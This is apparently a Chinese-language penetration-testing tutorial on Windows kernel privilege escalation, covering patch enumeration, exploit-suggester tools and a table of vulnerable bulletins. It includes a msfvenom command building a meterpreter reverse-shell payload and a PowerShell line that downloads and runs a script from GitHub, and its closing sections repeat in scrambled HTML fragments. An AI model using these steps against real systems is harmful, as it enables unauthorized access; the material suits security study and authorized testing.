Windows内核溢出提权技术详解<\/h1>

文章前言<\/h2>
在后渗透测试阶段，权限提升是一个绕不开的话题，其中"系统内核溢出提权"因其利用便捷成为了最为常用的方法。该方法通过查看目标系统中已安装的系统补丁，寻找缺失的"互补"补丁，并利用对应的提权类漏洞实现权限提升。<\/p>

权限查看基础<\/h2>

在获取目标系统shell后，首先需要确认当前用户及其权限：<\/p>

whoami
<\/span><\/span>whoami \/groups
<\/span><\/span><\/code><\/pre>典型输出显示用户权限为"Mandatory Label\Medium Mandatory Level"，这是标准普通用户权限。提权目标是将此提升为"High Mandatory Level"。<\/p>
补丁查询方法<\/h2>
1. 系统命令查看<\/h3>
systeminfo命令<\/strong>：<\/p>
systeminfo
<\/span><\/span><\/code><\/pre>输出显示已安装的补丁列表，如KB2534111、KB2999226等。<\/p>
WMIC命令<\/strong>：<\/p>
wmic qfe get Caption,Description,HotFixID,InstalledOn
<\/span><\/span><\/code><\/pre>查询特定补丁<\/strong>：<\/p>
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr \/c:"KB2534111"<\/span> \/c:"KB976902"<\/span>
<\/span><\/span><\/code><\/pre>2. 辅助网站查询<\/h3>
推荐使用https:\/\/bugs.hacking8.com\/tiquan\/<\/a>输入补丁号查询缺失的可利用补丁。<\/p>
3. MSF框架查询<\/h3>
MSF的post\/windows\/gather\/enum_pathes<\/code>模块可快速查找补丁信息：<\/p>

生成payload：<\/li>
<\/ol>
msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<\/span>192.168.188.129 LPORT=<\/span>4444<\/span> -f exe > shell.exe
<\/span><\/span><\/code><\/pre>
获取meterpreter会话后执行：<\/li>
<\/ol>
run post\/windows\/gather\/enum_patches
<\/code><\/pre>

查找可用漏洞：<\/li>
<\/ol>
run post\/multi\/recon\/local_exploit_suggester
<\/code><\/pre>
4. Empire框架查询<\/h3>
usemodule privesc\/powerup\/allchecks
execute
<\/code><\/pre>
5. PowerShell脚本 - Sherlock<\/h3>
Sherlock脚本(GitHub<\/a>)可检测本地提权漏洞：<\/p>
加载方式<\/strong>：<\/p>
Import-Module .\Sherlock.ps1
<\/span><\/span># 或远程加载<\/span>
<\/span><\/span>IEX(New-Object System.Net.Webclient).DownloadString('https:\/\/raw.githubusercontent.com\/rasta-mouse\/Sherlock\/master\/Sherlock.ps1'<\/span>)
<\/span><\/span><\/code><\/pre>查询所有漏洞<\/strong>：<\/p>
Find-AllVulns
<\/span><\/span><\/code><\/pre>查询特定漏洞<\/strong>：<\/p>
Find-CVE20177199
<\/span><\/span><\/code><\/pre>6. Windows Exploit Suggester<\/h3>
工具原理：通过比对systeminfo生成的文件发现未修复漏洞。<\/p>
安装<\/strong>：<\/p>
pip install xlrd
<\/span><\/span>git clone https:\/\/github.com\/AonCyberLabs\/Windows-Exploit-Suggester
<\/span><\/span><\/code><\/pre>更新漏洞库<\/strong>：<\/p>
.\/windows-exploit-suggester.py --update
<\/span><\/span><\/code><\/pre>使用流程<\/strong>：<\/p>

目标系统执行：systeminfo > sysinfo.txt<\/code><\/li>
本地分析：<\/li>
<\/ol>
.\/windows-exploit-suggester.py -d 2020-09-09-mssb.xls -i sysinfo.txt
<\/span><\/span><\/code><\/pre>常见提权漏洞列表<\/h2>



安全公告<\/th>
KB号<\/th>
影响系统<\/th>
<\/tr>
<\/thead>


CVE-2017-0213<\/td>
-<\/td>
Win10\/8.1\/7\/2016\/2010\/2008<\/td>
<\/tr>

MS17-010<\/td>
KB4013389<\/td>
Win7\/2008\/2003\/XP<\/td>
<\/tr>

MS16-135<\/td>
KB3199135<\/td>
2016<\/td>
<\/tr>

MS16-098<\/td>
KB3178466<\/td>
Win8.1<\/td>
<\/tr>

MS16-075<\/td>
KB3164038<\/td>
2003\/2008\/7\/8\/2012<\/td>
<\/tr>

MS16-032<\/td>
KB3143141<\/td>
2008\/7\/8\/10\/2012<\/td>
<\/tr>

MS15-051<\/td>
KB3057191<\/td>
2003\/2008\/7\/8\/2012<\/td>
<\/tr>

MS14-058<\/td>
KB3000061<\/td>
2003\/2008\/2012\/7\/8<\/td>
<\/tr>

MS11-080<\/td>
KB2592799<\/td>
2003\/XP<\/td>
<\/tr>

MS10-015<\/td>
KB977165<\/td>
2003\/2008\/7\/XP<\/td>
<\/tr>
<\/tbody>
<\/table>
漏洞利用资源<\/h2>
推荐项目：Heptagram<\/a>，收集了大量公开的Windows提权EXP\/POC。<\/p>
注意事项<\/h2>

使用EXP时需注意影响的操作系统版本<\/li>
部分工具如Windows-Exploit-Suggester的数据库可能较旧(最新到2017年)<\/li>
不同工具检测效果可能有差异，建议多种方法结合使用<\/li>
实际利用前应在测试环境验证EXP的兼容性<\/li>
<\/ol>
通过系统补丁信息分析结合上述工具，可以高效地发现和利用Windows内核溢出漏洞实现权限提升。<\/p>

安全公告<\/th>	KB号<\/th>	影响系统<\/th> <\/tr> <\/thead>
CVE-2017-0213<\/td>	-<\/td>	Win10\/8.1\/7\/2016\/2010\/2008<\/td> <\/tr>
MS17-010<\/td>	KB4013389<\/td>	Win7\/2008\/2003\/XP<\/td> <\/tr>
MS16-135<\/td>	KB3199135<\/td>	2016<\/td> <\/tr>
MS16-098<\/td>	KB3178466<\/td>	Win8.1<\/td> <\/tr>
MS16-075<\/td>	KB3164038<\/td>	2003\/2008\/7\/8\/2012<\/td> <\/tr>
MS16-032<\/td>	KB3143141<\/td>	2008\/7\/8\/10\/2012<\/td> <\/tr>
MS15-051<\/td>	KB3057191<\/td>	2003\/2008\/7\/8\/2012<\/td> <\/tr>
MS14-058<\/td>	KB3000061<\/td>	2003\/2008\/2012\/7\/8<\/td> <\/tr>
MS11-080<\/td>	KB2592799<\/td>	2003\/XP<\/td> <\/tr>
MS10-015<\/td>	KB977165<\/td>	2003\/2008\/7\/XP<\/td> <\/tr> <\/tbody> <\/table> 漏洞利用资源<\/h2> 推荐项目：Heptagram<\/a>，收集了大量公开的Windows提权EXP\/POC。<\/p> 注意事项<\/h2> 使用EXP时需注意影响的操作系统版本<\/li> 部分工具如Windows-Exploit-Suggester的数据库可能较旧(最新到2017年)<\/li> 不同工具检测效果可能有差异，建议多种方法结合使用<\/li> 实际利用前应在测试环境验证EXP的兼容性<\/li> <\/ol> 通过系统补丁信息分析结合上述工具，可以高效地发现和利用Windows内核溢出漏洞实现权限提升。<\/p>

Windows内核溢出提权技术详解<\/h1>

补丁查询方法<\/h2>

2. 辅助网站查询<\/h3> 推荐使用https:\/\/bugs.hacking8.com\/tiquan\/<\/a>输入补丁号查询缺失的可利用补丁。<\/p>

漏洞利用资源<\/h2> 推荐项目：Heptagram<\/a>，收集了大量公开的Windows提权EXP\/POC。<\/p>

2. 辅助网站查询<\/h3>
推荐使用https:\/\/bugs.hacking8.com\/tiquan\/<\/a>输入补丁号查询缺失的可利用补丁。<\/p>

漏洞利用资源<\/h2>
推荐项目：Heptagram<\/a>，收集了大量公开的Windows提权EXP\/POC。<\/p>